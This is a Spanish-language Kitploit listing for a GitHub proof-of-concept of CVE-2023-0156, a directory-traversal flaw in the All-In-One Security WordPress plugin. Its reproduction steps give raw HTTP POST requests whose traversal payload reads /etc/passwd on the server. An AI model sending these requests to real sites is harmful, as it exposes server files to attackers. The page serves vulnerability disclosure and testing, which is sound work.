Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-0156 — Repositorio para la vulnerabilidad CVE-2023-0156. | Kitploit
Herramientas/GitHubGitHub/b0marek/cve-2023-0156
Análisis de VulnerabilidadesExplotaciónRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubb0marek/cve-2023-0156

CVE-2023-0156

Repositorio para la vulnerabilidad CVE-2023-0156.

Ver Repositorio
hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

ID de CVE: CVE-2023-0156

Tipo de vulnerabilidad: Recorrido de directorios

Descripción: El complemento All-In-One Security (AIOS) para WordPress es vulnerable a un recorrido de directorios en versiones hasta, e incluyendo, la 5.1.4. Esto permite a atacantes autenticados con permisos de nivel administrador leer el contenido de archivos arbitrarios en el servidor.

Pasos para reproducir:

root@kitploit:~
POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 HTTP/2
Host: <host>
Cookie: <cookies>
Content-Length: 125
Content-Type: application/x-www-form-urlencoded

_wpnonce=<nonce>&aiowps_system_log_file=..%2F..%2F..%2F..%2Fetc%2Fpasswd&aiowps_search_error_files=View+latest+system+logs
root@kitploit:~
POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 HTTP/2
Host: <host>
Cookie: <cookies>
Content-Length: 98
Content-Type: application/x-www-form-urlencoded

_wpnonce=<nonce>&aiowps_system_log_file=..%2F&aiowps_search_error_files=View+latest+system+logs

Referencia:

  1. https://wpscan.com/vulnerability/caf1dbb5-197e-41e9-8f48-ba1f2360a759
  2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0156
  3. https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/all-in-one-wp-security-and-firewall/all-in-one-security-aios-514-authenticatedadmin-directory-traversal
Descargar herramienta